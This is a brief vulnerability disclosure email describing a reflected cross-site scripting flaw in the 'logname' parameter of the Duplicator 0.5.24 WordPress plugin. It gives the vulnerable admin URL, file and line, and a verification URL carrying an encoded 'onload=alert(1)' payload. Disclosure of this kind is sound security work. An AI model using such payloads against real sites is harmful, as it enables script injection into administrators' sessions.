Subject: Cross-Site Scripting (XSS) in Duplicator 0.5.24

Date: Sat, 15 Aug 2015 14:03:10 +0200

Hello,

Plugin: Duplicator 0.5.24 https://wordpress.org/plugins/duplicator/

1. Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: GET

Url: http://localhost/wp-admin/admin.php?page=duplicator-tools&tab=logging&logname=[xss]

Vulnerable parameters: logname

Example PHP callstack:

/duplicator/views/tools/logging.php:158

Verification:

http://localhost/wp-admin/admin.php?page=duplicator-tools&tab=logging&logname=%22+onload%3Dalert%281%29+%3E

--

Regards,
Marcin Probola,